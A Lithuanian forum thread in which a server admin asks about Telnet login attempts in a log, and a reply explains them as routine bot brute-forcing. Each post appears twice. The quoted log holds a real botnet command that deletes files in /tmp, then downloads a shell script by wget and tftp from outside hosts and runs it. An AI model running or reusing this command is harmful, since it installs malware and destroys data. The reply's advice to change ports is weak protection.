Klausima dėl Telnet

Sveiki, iškilo toks klausimas dėl Telnet. Žinau, kad tai vienas nesaugiausių dalykų, bet prisireikė prijungti prie serverio seną terminalą, COM kabelio po ranka neturėjau, tai įjungiau Telnet, patikrinau tą terminalą, ir pamiršau išjungti telnetą, na ryte prisiminiau išjungiau, pasižiūrėjau į logą, ir nustebau. Daugybė bandymų jungtis iš krūvos IP adresų. Iš pradžių pamaniau, kad gal botai kokie. Bet pasižiūrėjau logą:

5980 : 948 2015-12-29 6:12:48 937 : 0: login refused: [ root ] - Logon failure: unknown user name or bad password.

5980 : 948 2015-12-29 6:12:50 859 : 0: login refused: [ sh ] - Logon failure: unknown user name or bad password.

5980 : 948 2015-12-29 6:12:52 421 : 0: login refused: [ cd /tmp || cd /var/run; rm -rf *; busybox wget http://185.62.190.222/r6/sm.sh || wget http://185.62.190.222/r6/sm.sh; sh sm.sh; rm -rf sm.sh; busybox tftp -r .sm.sh -g 185.117.72.111 || tftp -r .sm.sh -g sm.updatebits.su; sh .sm.sh; rm -rf .sm.sh ] - Logon failure: unknown user name or bad password.

Čia bandymai kažkokį scriptą paleist. Tai va klausimas: Gal numanote kas čia, ar laužtis bandė ar dar kažkas?

Pridedu logą. Dauguma buvo 29 dienos naktįlog.txt

Sveiki, iškilo toks klausimas dėl Telnet. Žinau, kad tai vienas nesaugiausių dalykų, bet prisireikė prijungti prie serverio seną terminalą, COM kabelio po ranka neturėjau, tai įjungiau Telnet, patikrinau tą terminalą, ir pamiršau išjungti telnetą, na ryte prisiminiau išjungiau, pasižiūrėjau į logą, ir nustebau. Daugybė bandymų jungtis iš krūvos IP adresų. Iš pradžių pamaniau, kad gal botai kokie. Bet pasižiūrėjau logą:

5980 : 948 2015-12-29 6:12:48 937 : 0: login refused: [ root ] - Logon failure: unknown user name or bad password.

5980 : 948 2015-12-29 6:12:50 859 : 0: login refused: [ sh ] - Logon failure: unknown user name or bad password.

5980 : 948 2015-12-29 6:12:52 421 : 0: login refused: [ cd /tmp || cd /var/run; rm -rf *; busybox wget http://185.62.190.222/r6/sm.sh || wget http://185.62.190.222/r6/sm.sh; sh sm.sh; rm -rf sm.sh; busybox tftp -r .sm.sh -g 185.117.72.111 || tftp -r .sm.sh -g sm.updatebits.su; sh .sm.sh; rm -rf .sm.sh ] - Logon failure: unknown user name or bad password.

 

Čia bandymai kažkokį scriptą paleist. Tai va klausimas: Gal numanote kas čia, ar laužtis bandė ar dar kažkas?

Pridedu logą. Dauguma buvo 29 dienos naktįlog.txt

Tai yra normalu šių laikų pasaulyje.

Daugiausia tai kinų botai, bei užkrėsti kompiuteriai bruteforcina atsitiktinius kompiuterius ir servisus kurie yra ant standartinio porto.

Tarkim telnet portas 23, ssh 22, rlogin 513 ir taip toliau...

boto algoritmas ieško ip adresų kuriuose yra veikiantys šie portai, siunčia užklausas standartiniais prisijungimų loginais. pvz admin/admin root/root ir panašiai. Taip ieško durnelių bei svarbių neapsaugotų duomenų, arba kenkėjiškom programom platinti.

Tarkim visais laikais netgi namų routeriai yra atakuojami šiais portais, pagal numatymą jie visi uždaryti, o paprasti routeriai išvis neturi ką pasiūlyt ant šių portų.

Jau nekalbu apie atakas į svarbius įmonių serverius, ar sudėtingos architektūros tarnybines stotis.

Geriausia apsauga nuo to, tai keist standartinį portą. Pvz vietoj standartinio telnet 23 padaryt 25985.

O jei keist porto nesinori, tada nelieka nieko kito, kaip firewall pagalba filtruot leidimus.

Tam ir yra skirta specialybė, kaip sistemos administratorius, kurie iš to uždirba

Tai yra normalu šių laikų pasaulyje.

Daugiausia tai kinų botai, bei užkrėsti kompiuteriai bruteforcina atsitiktinius kompiuterius ir servisus kurie yra ant standartinio porto.

Tarkim telnet portas 23, ssh 22, rlogin 513 ir taip toliau...

boto algoritmas ieško ip adresų kuriuose yra veikiantys šie portai, siunčia užklausas standartiniais prisijungimų loginais. pvz admin/admin root/root ir panašiai. Taip ieško durnelių bei svarbių neapsaugotų duomenų, arba kenkėjiškom programom platinti.

Tarkim visais laikais netgi namų routeriai yra atakuojami šiais portais, pagal numatymą jie visi uždaryti, o paprasti routeriai išvis neturi ką pasiūlyt ant šių portų.

Jau nekalbu apie atakas į svarbius įmonių serverius, ar sudėtingos architektūros tarnybines stotis.

 

Geriausia apsauga nuo to, tai keist standartinį portą. Pvz vietoj standartinio telnet 23 padaryt 25985.

O jei keist porto nesinori, tada nelieka nieko kito, kaip firewall pagalba filtruot leidimus.

Tam ir yra skirta specialybė, kaip sistemos administratorius, kurie iš to uždirba

Na aš turiu harwarinį firewall Cisco. Bet buvau nustatęs atidaryt ir nestebėt 23, nes terminalas neatitiko ten kažkokio šifravimo. Telnet paprastai nenaudoju. Ačiū už atsakymą.

Na aš turiu harwarinį firewall Cisco. Bet buvau nustatęs atidaryt ir nestebėt 23, nes terminalas neatitiko ten kažkokio šifravimo. Telnet paprastai nenaudoju. Ačiū už atsakymą.

Tai matyt nestebi ir kitų jautrių portų. O reikėtų.

Nėra už ką.